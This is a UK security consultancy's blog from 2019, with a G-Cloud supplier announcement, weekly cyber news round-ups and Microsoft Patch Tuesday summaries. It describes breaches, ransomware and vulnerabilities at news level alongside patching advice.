We are delighted to announce that Ironshare has been awarded a place as a Crown Commercial Service listed supplier on the G-Cloud 11 framework.This follows our acceptance onto the DOS3 framework last year and now means that Ironshare software and consultancy services are available to view and purchase on the Government Digital Marketplace.The Digital Marketplace is a hub of 24,000+ cloud technology and support specialists, which public sector organisations can use to browse, compare and select potential providers.It opens up the opportunity for our Cyber Security services and solutions to be found and selected by public sector organisations seeking reputable suppliers. What’s more, we’re proud to be part of an initiative that recognises the importance of connecting public sector organisations with credible and trusted services.“In the last two years, we have established a strong client base predominantly in the SME and Corporate sector and now hope to continue that growth into the public sector. G-Cloud gives public sector organisations great access to reputable suppliers such as ourselves, and offers them the ability to evaluate and buy our cyber security solutions cost-effectively and with confidence.” – James Phipps, IronshareOur experience with a diverse range of clients has provided us with a unique insight into the challenges felt by organisations of all shape and size, who all have one thing in common – they are seeking simple, clear and effective cyber security solutions.Tools alone can’t beat all the challenges that organisations face, but our efficient and cost-effective services bring strong layers of security to organisations of any size.Recent research has revealed that phishing emails redirecting to fraudulent websites are perceived as posing the biggest cyber threat to UK business, with 59% of decision makers highlighting this as a chief security concern above everything else.Our Cisco Umbrella managed service provides an effective barrier to this threat, preventing users from accessing known bad external sites, and having successfully rolled out to many companies over the last 12 months, we have seen the positive impact and reassurance our service provides.We are able to meet even the most complex public sector requirements and hope that in joining the G-Cloud 11 framework it reinforces our commitment to providing effective cyber security solutions to organisations throughout the UK.About the Crown Commercial Service (CCS) and G-Cloud 11The Crown Commercial Service (CCS) works with both departments and organisations across the whole of the public sector to ensure maximum value is extracted from every commercial relationship and improve the quality of service delivery.The CCS goal is to become the ‘go-to’ place for expert commercial and procurement services.The G-Cloud 11 agreement supports the Government’s policy to centrally manage the procurement of common goods and services through an integrated commercial function at the heart of government.
By
Stuart Hare
on
13/7/19
Welcome to the Ironshare Cyber Round-up where we look back atthe events of that last week and cover some of the news, posts, views, and highlightsfrom the world of Security.
In this week’s round-up:
NCSC’s Cyber Essentials scheme is evolving to keep up withthe everchanging threats of cyber security; they aim to ‘meet the cybersecurity challenges of today, and tomorrow’. NCSC plan to work with a singledelivery partner who will take over running the scheme and change thecertification by condensing the 5 accreditation bodies down into just one.These changes are designed to enhance the customer experience and help keep thescheme up to date in order to remain relevant. Cyber Essentials will improvethrough continuous collaboration with its new partner, to ensure the rightchanges are made to produce the best results. The new partner will take overthe scheme at the end of March 2020, at which point we will begin to see thesechanges roll out.
By NCSC.gov.uk.
Mosss, an interior design tools startup, accidentallydeleted their G Suite account. The firm immediately contacted google after theincident requesting that they restore their account, however they have sincemocked Google for providing no support. After a week of desperately trying toget a response on the status of their account, the firm received a one-lineemail from google that simply said that their data was lost. The company waslater advised to file a lawsuit to access their data and have since suedGoogle. Consumers of cloud-based services, such as G-Suite or Office 365, shouldrealise they are responsible for their own data, ensuring that offline backupsof their data are completed on a regular basis.
By TheRegister.co.uk.
Eurofins Scientific, the UK’s biggest provider of forensicservices, has been hit by what the firm described as a “highly sophisticated”ransomware attack. The ransomware computer virus hit just over a month ago, andas a result the British police have been forced to suspend work with the firm.The attack has disrupted work for both Eurofins and the police, since thecompany is responsible for more than half of the UK’s forensic scienceprovision. The amount of money requested by the attackers was not disclosed tothe BBC, however it was confirmed that they paid it. Three weeks after theattack, Eurofins reported that operations were “returning to normal”.
By BBC.co.uk.
British Airways are facing a record fine after suffering adata breach last year; the breach involved personal information and paymentcard details being stolen from around 500,000 customers. The ICO has onlyannounced a notice of intention for British Airways and have not yet issued thefine. The company has been allowed 28 days to appeal, and ICO plan to listen totheir intentions before following through. The reason British Airways arefacing such a big fine is because of the recently instated General DataProtection Regulations, which states a firm can be fined for up to 4% of theirannual turnover. Despite this, the fine is equal to just 1.5% of BritishAirway’s turnover in 2017.
By TripWire.com.
A recent data breach has exposed the personal information ofaround 383 million guests, including names, email addresses, phone numbers,dates of birth and all hotel reservation information. Millions of payment cardand passport details were also compromised. ICO intend to fine MarriotInternational hotel group £99.3 million, following the breach. It is suspectedthat approximately 7 million of the hacked records related to UK residents.Since the breach, Marriot has worked closely with ICO investigation to improveits security, in order to mitigate the risk of another breach.
By HotForSecurity.Bitdefender.com.
A recent vulnerability discovered in Zoom, a video conferencingservice, allows an attacker to take control of a user’s webcam through amalicious website. Over 4 million users are at risk from this flaw, whichappears to only affect the collaboration client for Mac. This exploit can stillaffect those who have recently uninstalled Zoom, so it is advised that allusers apply the necessary patches as soon as possible. The emergency patchcompletely removes the local web server and allows users to manually uninstallthe app; a link to the patch is included in the original post. Zoom are due to releasefurther updates that aim to resolve other issues around the safety of theservice.
By Threatpost.com.
Attackers are exploiting a new high-severity flaw in AppleiMessage that allows them to essentially cause a denial of service on a targetdevice. By sending a specially crafted message, the attacker can completelydisable the victim’s device until it reset to factory settings, wiping its datain the process. The vulnerability was discovered by a Google Project Zeroresearcher in April and described the attack as a “malformed message”. Applerecommend updating your device to minimise the risk of this attack; patches forthe flaw were released on May 13, 2019 with the release of iOS 12.3.
By Threatpost.com
And that’s it for this week round-up, please don’t forget totune in for our next instalment.
Why not follow us on social media using the links providedon the right.
Edition #49 – 12th July 2019
By
Joshua Hare
on
11/7/19
The July Patch Tuesday security updates have been releasedby Microsoft today and they include a total of 77 vulnerabilities. 15 updates havebeen rated Critical, 62 Important and 6 vulns have been publicly disclosed. Twoof the listed vulns are already exploited in the wild.
MS products covered by these updates are Windows OperatingSystems, DHCP, ASP.net, Azure, GDI, Microsoft Edge and Internet ExplorerBrowsers, Office, .Net framework, SQL Server, Visual Studio and MS ExchangeServer.
CVE-2019-0785 is a critical memory corruption vulnerability (with a CVSS score of 9.8) in the Windows Server DHCP Service, affecting all Windows server operating systems from 2012 to 2019. If the server is configured in DHCP failover mode, an attacker can exploit this vuln by sending a crafted DHCP packet to the server. A successful exploit attempt will allow remote code execution or a possible DHCP Denial of Service due to an unresponsive service.
CVE-2019-1102 covers a critical remote code execution vulnerability in the Windows Graphics Device Interface (GDI+). Exploitation can be achieved by convincing a user to access a malicious website via an email attachment or link, or though file sharing services such as OneDrive or Box. Once successful, complete control of the affected system can be achieved, giving the attacker access to view, change or delete data, as well as create new accounts with privileged access.
CVE-2019-1113 is a critical vulnerability present in .Net framework v2.0 – v4.8. By sending a malicious file, that is opened by a user with an affected version of .Net, a bad actor can exploit this vuln and run remote code against the target. If the user is logged in with admin privileges the actor could gain complete control of the affected system.
CVE-2019-0880 relates to a local privilege escalation issue, rated Important, in the splwow64 component which is used to translate drivers for 32-bit applications. This affects both client and server versions of Windows and allows an attacker to gain privileged access to an affected system. Although this is a local vulnerability it is common to see this type of exploit bundled with other malware to increase privileges and the likelihood of successful attack. This vuln is currently being exploited in the wild.
CVE-2019-1132 is another important rated vuln that can result in privilege escalation due to memory handling issues. This exists in the Win32k component of older operating systems such as Windows 7 and Windows 2008. Exploiting this vuln can lead to arbitrary code being run in kernel mode, allowing malware installation, the creation of new admin accounts and the ability to both change and delete data. This is another vuln that is being exploited in the wild.
In addition, numerous critical vulns exist in Microsoft browsers (Edge and Internet Explorer) and their scripting engines. These vulns relate to memory corruption and handling issues, that can result in remote code execution. These are largely exploited by convincing users to access malicious web content or clicking links in emails or instant messages.
Please review this month’s updates and get patching as soonas you can!
Keeping up to date with security patches for your operatingsystems and software, is a critical part of delivering and maintaining a strongsecurity posture, please ensure you test and update as quickly as possible to reducerisk, prevent exploitation and to ultimately stay secure.
For a full list of this month’s updates please see the linksbelow:
Patch Tuesday release notes: https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/48293f19-d662-e911-a98e-000d3a33c573
Security update guide: https://portal.msrc.microsoft.com/en-us/security-guidance
By
Stuart Hare
on
9/7/19
Welcome to the Ironshare Cyber Round-up where we look back atthe events of that last week and cover some of the news, posts, views, and highlightsfrom the world of Security.
In this week’s round-up:
Following a recent security incident, Microsoft has announced the introduction of mandatory multi-factor authentication for Cloud Solution Providers. CSPs typically offer licenses for a lower price than what Microsoft do, as well as providing management services, making them appealing to most companies. For this reason, one company opted to partner with PCM Inc., the world’s sixth largest CSP, who managed the initial setup of Office365 for them. One PCM employee maintained full access to all the company’s files in Office365 after the initial setup, without the security team realising. This employee, who was not using multi-factor authentication, was later hacked leaving the Office365 documents vulnerable. By forcing CSPs to use MFA, Microsoft hope to prevent these kinds of incidents from happening in the future.
By KrebsOnSecurity.com.
Equifax suffered a massive data breach back in 2017 that allowed attackers to steal the names, addresses, social security numbers and dates of birth of over 150 million consumers. The Equifax IT team was aware of the vulnerability for around 5 months before the breach occurred but failed to patch it. The company kept the breach secret for 40 days before revealing it to the public. During this time, the man next in line to be global CIO of Equifax, Jun Ying, used the confidential information of the breach to sell his shares for almost US $1 million before the public learned of the incident. Ying was sentenced to four months in federal prison for insider trading and was fined accordingly.
By GrahamCluley.com.
Warnings have been issued by the Canadian CommunicationsSecurity Establishment regarding the upcoming elections. They believe thatforeign actors have attempted to influence the country’s October election. Theaccusation was supported by the Canadian Security Intelligence Service (CSIS),who issued similar warnings. It was unclear in the reports which groups wereattempting to tamper the elections, but it was said that threat actors were seekingto influence the Canadian public ahead of the voting period.
By SCMagazine.com.
The telecoms regulator, Ofcom, plans to introduce a new wayto switch UK mobile operators; their new “text-to-switch” system does notrequire mobile users to speak with their existing provider, which makes theprocess much less painful. Instead, you must text the word “PAC” to the number65075; this responds with a code that can be used to switch providers. Despitethis process being a much easier alternative to older methods, it opens up thepossibility of a significant increase in fraud for mobile users. This newmethod will provide attackers with another easy route to SIM Swap, furtherthreatening mobile and online account security, including compromising two factorauthentication services that use SMS text messaging.
By ISPreview.co.uk.
It isn’t a secret that ATMs aren’t very secure, which makesthem easy, profitable targets for attackers. We have recently seen a rise innew ATM attacks, that are threatening users, and potentially their bank cards.One of these attacks is Jackpotting, which involves making a hole to plug alaptop into the ATM; this can then be used to force money out of the machine.Thanks to the ATMs minimal encryption, this is extremely easy for attackers topull off. Another attack that is on the rise is Shimming. Shimming involves usinga thin insert in the card reader, which can steal data from chip-enabled cards.The tech required makes this a more expensive attack, but the simplicity of it meansanyone can do it. A common way to spot for Shimming is feeling for resistancein the card reader when inserting your card. Users are recommended to use tapand smartphone payments such as apple pay, to bypass the security issues ofATMs.
By SecurityWeek.com.
Attackers have built a new complex loader that ensures antivirus systems do not detect their malicious payload. The loader uses the well-known technique, “Heaven’s Gate”; a trick that allows 32-bit malware running on 64-bit systems to disguise API calls by switching to a 64-bit environment. In this instance, the loader was used in a new campaign to hide and deliver the popular malware, HawkEye Reborn. This malware is never saved to the hard disk of the target machine, it is run in memory to evade detection from standard anti-virus products, and can be adapted to deploy other malware payloads. Advanced Endpoint protection such as Cisco AMP for Endpoints can help in defending this type of fileless malware. In-Depth analysis of how this works is included in the original post by Talos Intelligence.
By TalosIntelligence.com.
The two vulnerabilities, SACK Panic (CVE-2019-11477) andSACK Excess Resource Usage (CVE-2019-11478), are affecting over 30 different products.The vulnerabilities exist because of a flaw associated with the Linux kernelimplementation of TCP Selective Acknowledgement (SACK), which can be exploitedby an attacker to execute a Denial of Service attack against any of theaffected products. The flaw was originally discovered by Netflix researchers,who then disclosed it to the public. A list of all affected products isincluded in the original post, as well as any patches currently available. Keepin mind that VMware is still working on patching these vulnerabilities and havenot yet released patches for all products.
By SCMagazine.com.
And that’s it for this week round-up, please don’t forget totune in for our next instalment.
Why not follow us on social media using the links providedon the right.
Edition #48 – 5th July 2019
By
Joshua Hare
on
4/7/19
Welcome to the Ironshare Cyber Round-up where we look back atthe events of that last week and cover some of the news, posts, views, and highlightsfrom the world of Security.
In this week’s round-up:
Hackers have found a way to obtain complete control ofmobile carrier networks after infiltrating over a dozen companies since 2012.The hackers have been using their power to steal sensitive data and monitor users,whilst also having the potential to do so much more; they even have the controlto shut down communications if they wanted. Despite this, it is believed thatthe hackers care little about disruption and are more focused on espionage. Theattack seems targeted, as only a small portion of the users they are monitoringhave had data stolen (likely high-profile military and government figures).
It appears that the hackers exploited old vulnerabilities to infiltrate the carriers, and spread the malware by flooding all the computers on a network to achieve successful login attempts; this led to the creation of user accounts with escalated privileges, which they used to blend in as company staff. Researchers recommended that mobile carriers closely monitor high-privilege accounts and servers, however users can do nothing to protect themselves from being monitored.
By cnet.com.
NASA recently revealed that 500 MB of data has been stolen from its Jet Propulsion Laboratory (JPL) by an attacker using a Raspberry Pi. The stolen files detail the transfer of military technology, as well as space technology related to the Mars Science Laboratory Mission. Auditors learned that users were able to access applications on JPL’s network that they should not have had access to, meaning the attacker could also gain similar access to the network. Since the system admins didn’t effectively monitor devices that were added to the network, the hacker went undiscovered for a very long time.
Upon discovery, NASA officials were worried that the attacker would be able to disrupt their mission systems and intercept messages, and so they disconnected the Johnson Space Center from the core Gateway. The Johnson Space Center is responsible for the ISS (International Space Station) program, which puts into perspective the scale of the breach. The hacker went 10 months before being discovered and was not the first person to target NASA. The massive amount of data regarding cutting-edge technology has made NASA a profitable target for malicious actors over the years.
By DigitalTrends.com.
The bad actors responsible for the Wipro phishing attack have been spotted targeting several other big companies, including Expedia, Rackspace and Western Union. The hacker group is also responsible for a large campaign of phishing attacks, intended to obtain cash from vulnerable businesses. The group was described as ‘reasonably sophisticated’, and it is believed that they used obscure phishing templates to carry out the attacks. The templates used in these attacks are identical to those marketed by pentesting firm, Lucy Security, although they deny their that software products were used in the Wipro attack.
By TheRegister.com.
A new method of phishing has been recently discovered thatattackers are taking advantage of. Commonly referred to as Calendar Phishing,attackers are making use of the default google calendar settings that allowinvitations and events to be sent to users, even if that user hasn’t respondedto the invite. The victims are typically caught off guard by calendar phishing,and are likely to dismiss the possibility of a link being malicious if it comesfrom a trusted google app. This method of phishing, although effective, can beprevented very easily. Simply changing your event settings in Google Calendarto stop automatic invitations will resolve this issue; details on how to dothis are included in the original post.
By FossBytes.com.
A recent security failure has resulted in WeTransfer, a popular online file sharing service, sending file transfer links to the wrong recipients. This could potentially lead to unauthorised parties accessing sensitive files. Despite acknowledging the security incident, WeTransfer did not reveal how many users were affected, who the emails were sent to and it is also unclear whether this was a malicious attack, or a mistake made by the company. Users are recommended to encrypt sensitive files before using file sharing services, and to use a medium other than email when transferring files.
By GrahamCluley.com.
Last week, two zero-day flaws were discovered in MozillaFirefox. The first involved manipulating JavaScript objects, whereas the secondwas a sandbox escape allowing access to the OS layer. Researchers discoveredthat the two flaws were intended to be used together to create a malicious backdoorknown as netwire, which can infect macOS and Linux systems. The netwirerelation was discovered by Apple security expert Patrick Wardle, however it isnot clear how the attackers learned that the flaws worked together. Despitethis, both flaws were patched by Mozilla last week and fixes for both vulnerabilitiesare included in version 67.0.4 of Firefox.
By NakedSecurity.com.
Programming tricks such as Rambleed allow an attacker toread bits in memory without directly accessing your memory space, due to areliability issue in DRAM cells. Rambleed attacks have their flaws, and onlyallow the attacker to make educated guesses as to where bits are stored,however the authors of the Rambleed paper managed to successfully read OpenSSHprivate keys from memory without root privileges. In response to the extractionof private keys, OpenSSH have released new code, which works by only keepingprivate keys in memory for the short time it is required. OpenSSH’s aim is toreduce the time that keys are exposed to danger, thus making RAM-sniffingattacks much harder. The functions for the key-shielding code are included inthe original post.
By NakedSecurity.com.
And that’s it for this week round-up, please don’t forget totune in for our next instalment.
Why not follow us on social media using the links providedon the right.
Edition #47 – 28th June 2019
By
Joshua Hare
on
27/6/19
Welcome to the Ironshare Cyber Round-up where we look back atthe events of that last week and cover some of the news, posts, views, and highlightsfrom the world of Security.
In this week’s round-up:
XENOTIME, the Advanced Persistent Threat group behind the TRISIS Industrial Control System (ICS) malware, whom originally targeted oil and gas industries, has recently been expanding its focus to target electric companies. The Russian linked XENOTIME group, have been spotted exploring the networks of U.S. electric organisations, indicating a potentially attack on critical infrastructure. It is believed that an attack of this nature could also result in loss of life and major physical damage, making it extremely dangerous. Governments and companies are recommended to work cooperatively to defend critical infrastructure and the lives of the workers, from such devastating cyber attacks.
By ThreatPost.com.
ASCO, one of the world’s largest airplane manufacturers, has been hit by a ransomware attack. After ASCO’s plant in Zaventem, Belgium, was severely impacted by the infection, it was forced to shut down production in its U.S, Canada and Germany based factories. About 70% of the Belgium plant’s workers have been given leave for a week until the issue is resolved. ASCO have not revealed if the ransom has been paid, but it is evident that the damage caused by the attack is severe. It is never recommended to pay the ransom, always ensure that you have offline backups available to restore systems and service, in the event of an attack.
By ThreatPost.com.
A Mobile cyberespionage campaign, named “Bouncing Golf”, has been discovered and it is targeting Middle Eastern Countries. The malware involved in the campaign has been identified as AndroidOS_GolfSpy.HRX; and possesses a large amount of cyberespionage capabilities. The attack works by embedding malicious code in applications that bad actors have repackaged from legitimate apps. The capabilities of this malware give it the potential to completely hijack an infected android mobile device, and from this hackers can effectively steal device accounts, device locations, stored files and messages. Although the number of devices impacted so far is small in number, military info was included in the stolen data. Users are recommended to keep their devices up to date with the latest software and install mobile endpoint security (such as Cisco AMP for Endpoints), to help protect your device against these types of exploits and rogue applications.
By TrendMicro.com.
A new critical vulnerability in Firefox and Firefox ESR allows attackers to completely take over any device affected by the exploit. Due to a flaw in Array.pop method, the attacker can exploit JavaScript objects, resulting in an exploitable crash that allows control over an affected system. Anyone using Mozilla Firefox is vulnerable to an attack of this nature. Patches have now been released for this vulnerability, available in Firefox 67.0.3 and Firefox ESR 60.7.1. As this vuln is being actively exploited in the wild, Mozilla recommends that users update their systems immediately.
By SCMagazine.com.
A new cryptocurrency mining botnet has been discovered, that exploits poor default settings, including a lack of authentication on open ADB (Android Debug Bridge) ports. The botnet has the potential to spread to any system that has previously established an SSH connection with the infected host. This vulnerability is present in all Android-based devices, and the botnet has been seen operating in 21 different countries. Users are suggested to update their devices immediately and always change any default authentication settings to ensure devices are secure.
By TrendMicro.com.
MSRC (Microsoft Security Response Center) recently confirmedthe existence of an active Linux worm that could potentially take advantage ofa critical Remote Code Execution vulnerability in Linux Exim email servers.Only customer’s using Exim version 4.87 to 4.91 are affected, and it wasconfirmed that the vulnerability does not exist in Microsoft Azureinfrastructure and Services. Microsoft recommends that any customer’s running avulnerable version of Exim should update to the latest fixed version as soon aspossible.
By Microsoft.com.
And that’s it for this week round-up, please don’t forget totune in for our next instalment.
Why not follow us on social media using the links providedon the right.
Edition #46 – 21st June 2019
By
Joshua Hare
on
20/6/19
Welcome to the Ironshare Cyber Round-up where we look back atthe events of that last week and cover some of the news, posts, views, and highlightsfrom the world of Security.
In this week’s round-up:
MI5 have been holding on to people’s personal data illegallyfor many years and have been keeping it a secret. Under the InvestigatoryPowers Act, MI5 can apply for a warrant to obtain people’s personal data, forimportant investigations such as counter-terrorism. The act also states that datashould only be kept for as long as it is relevant to an investigation; despitethis, MI5 have reportedly held onto this information unlawfully for much longerthan required. The Investigatory Powers Commissioner also announced that theretained information had not been stored safely either. It was revealed thatsenior members of MI5 have been aware of the security issues since 2016, andhave kept it secret from the public, the home office and the prime minister.
By BBC.co.uk.
Spammers have found a way to beat the Gmail spam filters bytaking advantage of the ‘preferential treatment’ it offers its ownapplications. Messages shared by other Google apps, such as Google Calendar andPhotos, get a free pass through the Gmail filters; this means that any spamincorporated into one of these messages will also be allowed past. For example,a scammer can send a malicious link to a user via the description of a GoogleCalendar invite. Similar bypass methods have been observed in Google Forms,Drive, Photos, and even Google Analytics. A spokesperson for Google announcedthat they are constantly trying to combat spam, and while they are makingprogress, not all spam will be blocked.
By TheRegister.co.uk.
A high severity vulnerability has been discovered in popular command-line text editing applications, Vim and Neovim. The vulnerability allows an attacker to execute commands and gain remote control of your Linux system without you knowing and can be exploited as soon as you open a file on either of the applications. The text editors include a feature that lets you use a set of custom preferences, known as ‘modelines’. Sandbox Protection is enabled in case the modeline contains an unsafe expression, however this can be bypassed by using the “:source!” command. Updates were released by Vim and Neovim to address the flaw, and it is recommended that you install these patches as soon as possible. Additional recommendations are listed in the original post.
By TheHackerNews.com.
Email is the primary form of communication among businesses,which is why it is still the preferred delivery method for most attackers. In2018, many of the top critical threats used email to execute attacks. Forexample, Emotet delivered malware by attaching malicious docs to emailsdisguised as invoices or payment-related spam. Despite transforming into a muchmore advanced platform, Emotet still uses email as its preferred method oflaunching attacks. Other critical threats such as cryptomining also use emailto deliver malicious payloads. A newly emerging threat, Unauthorised MDM(Mobile Device Management) Profiles, also uses email to trick the user intoinstalling a malicious profile onto their device. Be aware that the popularityof email attacks means that they won’t be going anywhere, so stay vigilant.
By SecurityWeek.com.
The months are rolling round fast meaning its update timeagain. The June Patch Tuesday security updates include a total of 88 vulnerabilities.17 updates have been rated Critical, 65 Important, 4 vulns have been publiclydisclosed but none have been detected as already exploited in the wild.
By Ironshare.
Microsoft released an update in the April 2019 edition of Patch Tuesday, for an Important Win 10 privilege escalation bug (CVE-2019-0841), however this week, a second bypass for this patch has been published on GitHub by SandboxEscaper. This vulnerability allows a low-privileged attacker to gain access to files which they wouldn’t usually have control over. Microsoft did not have enough time to fix this before the June Patch Tuesday, so there is currently no available patch to resolve this flaw.
By ZDNet.com.
A new vulnerability has been discovered in IOS XE, the Linuxversion of Cisco’s Internetworking Operating System. The flaw allows a remoteattacker to take full control of routers or switches due to a vulnerability in theweb-based UI. Since the web UI does not have CSRF (Cross-Site Request Forgery)Protection, an attacker can send a malicious link to a user that executes anunwanted action on the web app they currently have open. The vulnerability wasgiven a CVSS Score of 8.8 out of 10. There are currently no workarounds for theflaw, however a software patch has been released by Cisco.
By threatpost.com.
And that’s it for this week round-up, please don’t forget totune in for our next instalment.
Why not follow us on social media using the links providedon the right.
Edition #45 – 14th June 2019
By
Joshua Hare
on
13/6/19
The months are rolling round fast meaning its update timeagain. The June Patch Tuesday security updates include a total of 88 vulnerabilities.17 updates have been rated Critical, 65 Important, 4 vulns have been publiclydisclosed, but none have been detected as already exploited in the wild.
MS products covered by these updates are Windows OperatingSystems, Hyper-V, Azure, Microsoft Edge and Internet Explorer Browsers, Office,ChakraCore scripting engine, Skype for Business, and MS Exchange Server.
CVE-2019-0620, CVE-2019-0709 & CVE-2019-0722 focus on a critical remote code execution vulnerabilities in Microsoft’s virtual machine hypervisor, Hyper-V, that is available in its windows operating systems. A malicious application can be used on a virtual machine (guest OS) to trigger the exploit and cause code execution on the physical host OS that the guest is running on. This is due to a failure in the input validation of authenticated users on the guest virtual machine.
A memory handling vuln exists in ActiveX Data Objects (ADO) that can result in the execution of remote code, using the logged in user privileges. CVE-2019-0888 can be exploited by a malicious actor by convincing the user to access a crafted website.
Eight of the remaining critical vulns belong to the Chakracore scripting engines in Microsoft Edge and Internet Explorer browsers. Each relateto handling issues for objects in memory, that if exploited allow the sameprivileges as the current user. If the current user has admin rights, an attackerlaunching the exploit could gain complete control of the target system.
An Important spoofing vuln has been identified in the Azure DevOps server. CVE-2019-0996 results in cross site request forgery, via improper handling of application authorisation requests. An attacker can use a crafted page that convinces the user to click a malicious link and exploit this vuln. OAuth authorisation can then be bypassed to register applications in Azure DevOps.
Please review this month’s updates and get patching as soonas you can!
Keeping up to date with security patches for your operatingsystems and software, is a critical part of delivering and maintaining a strongsecurity posture, please ensure you test and update as quickly as possible to reducerisk, prevent exploitation and to ultimately stay secure.
On a final note if you somehow missed out patching the May 2019 updates, please do get patching straight away, as it is vital everyone is protected against the CVE-2019-0708 critical RDP vuln, that could be the next WannaCry.
For a full list of this month’s updates please see the linksbelow:
Patch Tuesday release notes: https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/253dc509-9a5b-e911-a98e-000d3a33c573
Security update guide: https://portal.msrc.microsoft.com/en-us/security-guidance
By
Stuart Hare
on
12/6/19
Welcome to the Ironshare Cyber Round-up where we look back atthe events of that last week and cover some of the news, posts, views, and highlightsfrom the world of Security.
In this week’s round-up:
The RDP issue known as ‘BlueKeep’ that has been rolling insecurity news for the past 4 weeks, is now firmly on the radar of government securityservices, after the NSA has warned Microsoft Windows users to ensure theirsystems are updated. BlueKeep allows unauthenticated access to MS RemoteDesktop Services, and there is significant concern that this could become thenext WannaCry. Both Microsoft and the NSA are urging users to patch theirsystems as soon as possible to prevent cyber-attacks that could result incomplete system compromise.
By BBC.co.uk.
Radisson Rewards have contacted their members again, after inadvertentlysending emails containing account information to the wrong members. Rewardsmembers in Europe, the Middle East and Africa had their personal information exposedin the leak which included names, reward member numbers and balance info. Radisson’s investigation into the issue hasconfirmed that their network was not compromised, and they are asking membersto delete any emails received inadvertently. Not the worst breach seen thisyear but another goof, nonetheless.
By GrahamCluely.com.
Not directly cyber security related, but this topical postfrom GCHQ provides a brief insight into the early years of security and intelligence.It describes the key role that was played by the people in Bletchley Park, andtheir activities that helped turn the tide of World War II.
By GCHQ.gov.uk.
The inaugural UEFA Nations League finals have started thisweek, and as fans without Sky subscriptions find ways to the watch the footballfor free, they are at increased risk of cyber-attack. Fake streaming sites thatclaim to offer a live stream of the football for free, are a popular method of cybercriminals, to either install malware or scare the user into thinking they havea virus, so they can compromise machines or steal personal and financialinformation. Be on the look out for fake sites, domains / URLs with incorrectspelling, and stick to legitimate means of watching the game, to stay safe online.
By independent.co.uk.
Cisco Talos have identified a string of documents that forma series of cyber attacks they have dubbed the Frankenstein campaign. This campaignuses a combination of different open source techniques to build the tools for thesetargeted attacks, with an aim to infect the victims with malware. Once infectedthe system would communicate with the attackers C2 infrastructure via anencrypted channel, allowing remote interaction with the compromised machinethat could download further malware payloads, extract data and stealcredentials.
Advanced malware protection such as Cisco AMP and secureinternet gateways like Cisco Umbrella, are great tools to defend against thesetypes of advanced malware.
By Cisco Talos Intelligence - talosintelligence.com.
Another flaw in the MS Remote Desktop Protocol (RDP) has surfaced this week, that allows an attacker to bypass the lock screen. The flaw is triggered when a temporary disconnect occurs for a locked RDP session, and upon re-connection the session is restored unlocked allowing access to the system. Integrated Two factor authentication services are also bypassed by this vuln. The attacker does need physical access to the system that is running the locked RDP session. There is no current patch for this issue, and if reports are correct Microsoft are not in a hurry to deliver one.
By TheHackerNews.com.
A security researcher has discovered that security featuresin Apple MacOS can be bypassed using code validation issues that generatessynthetic clicks. Security access prompts, that are generated by the operatingsystem when an application wants to use items such as the camera, microphone,backups and remote-control services, can be bypassed using a synthetic click ofthe OK button, allowing malicious actors and applications access to systemcomponents. Apple are aware of the vuln, but it’s unclear if or when a fix willbe available.
By SecurityWeek.com.
And that’s it for this week round-up, please don’t forget totune in for our next instalment.
Why not follow us on social media using the links providedon the right.
Edition #44 – 7th June 2019
By
Stuart Hare
on
6/6/19
Welcome to the Ironshare Cyber Round-up where we look back atthe events of that last week and cover some of the news, posts, views, and highlightsfrom the world of Security.
In this week’s round-up:
Flipboard, the popular news app, has this week confirmed that it has been hacked twice in the last 12 months. Unauthorised access to it databases has resulted in the hacker gaining access to potentially 150 million user account details, which included names, emails and encrypted passwords. Users of Flipboard will still be able to access the app, but they will be requested to replace their password the next time Flipboard is used, and connections to social media accounts will need to be reset.
By Forbes.
GCHQ, the British intelligence arm of the UK government are in the crosshairs of tech companies over their proposal for a ‘Ghost User’ back door into encrypted messaging services. A host of tech giants that include Microsoft and WhatsApp are against the proposal, stating concerns around how this would lead to a serious threat to cyber security, privacy and human rights. Dr Ian Levy of the NCSC, states this is the starting point for the discussion of a hypothetical proposal which will assist in the fight against global terrorism.
By The Register.
The local Government in Baltimore have been suffering for several weeks now after being hit by a crippling ransomware attack. Thousands of computers have been infected by the malware, which is reportedly using the NSA’s EternalBlue exploit (previously used in the WannaCry ransomware) that was leaked by the ShadowBrokers group in 2017. There are mixed reports across the industry though, with some experts suggesting EternalBlue is not involved, and that RobbinHood ransomware is to blame. If EternalBlue is involved, then it’s highly likely that Baltimore’s computers systems had not been patched for some time.
By BBC.
A new phishing threat has been discovered that pretends tobe an alert from Office 365. The alert email warns the victim that an unusual numberof files in their account have been deleted and tricks the user into clicking alink to verify the details. A fake Microsoft login page then aims to steal the victimsOffice 365 credentials. The fake page is hosted on MS Azure and uses valid MScertificates which makes the threat far more convincing.
By Bleeping Computer.
The latest blog from Cisco Talos provides a look into theincrease of ATM cash machine malware over the last 10 years. It gives anoverview on the evolution of the malware, explains the differences betweenSkimmer and cash dispenser types, and covers the numerous families of ATM malwareseen in the wild. It concludes with good security practices to secure your ATMdevices.
By Cisco Talos Intelligence.
A critical vulnerability has been found in the Convert PlusWordPress plugin, that allows malicious actors to create new WordPress adminusers through the use of a hidden field. By intercepting a form request, theactor can modify the “cp_set_user” field to administrator and submit the form tocreate a new privileged admin account, with full control of the WordPressinstance. If you are running the Convert Plus plugin please get updating to version3.4.3, to fix this flaw.
By Bleeping Computer.
And that’s it for this week round-up, please don’t forget totune in for our next instalment.
Why not follow us on social media using the links providedon the right.
Edition #43 – 31st May 2019
By
Stuart Hare
on
30/5/19
Welcome to the Ironshare Cyber Round-up where we look back atthe events of that last week and cover some of the news, posts, views, and highlightsfrom the world of Security.
In this week’s round-up:
Researcher Anureg Sen, has discovered an unprotecteddatabase containing the details for millions of Instagram users. The data wasfound in a publicly accessibly Amazon Web Services S3 storage bucket, managed bymarketing company Chtrbox, which could be accessed without needing a usernameor password. Users profiles and contact information was included in the leak.
By Tripwire.
We have seen a huge increase in phishing scams over the pastcouple of years and they are not looking like slowing down. Brian Krebs hasreported on a recent scam campaign that hit more that 100,000 business emailswith legal threats. A fake document is delivered to the victim and includes trojanmalware that can deliver additional malicious content such as ransomware. Asper our usual guidance never open email attachments or click on links if theyare untrusted or you are not expecting them.
By KrebsonSecurity
The infamous GozNym gang, who were responsible for stealingapproximately 100Million Euros from its victims, have been taken down in ajoint effort by US and EU law enforcement agencies. The group of cyberspecialists used advanced banking malware, sourced from a mix of the Gozibanking trojan and the Nymaim ransomware variant to capture banking credentialsand steal funds, before laundering the money through its financial network.
By SCMagazine UK.
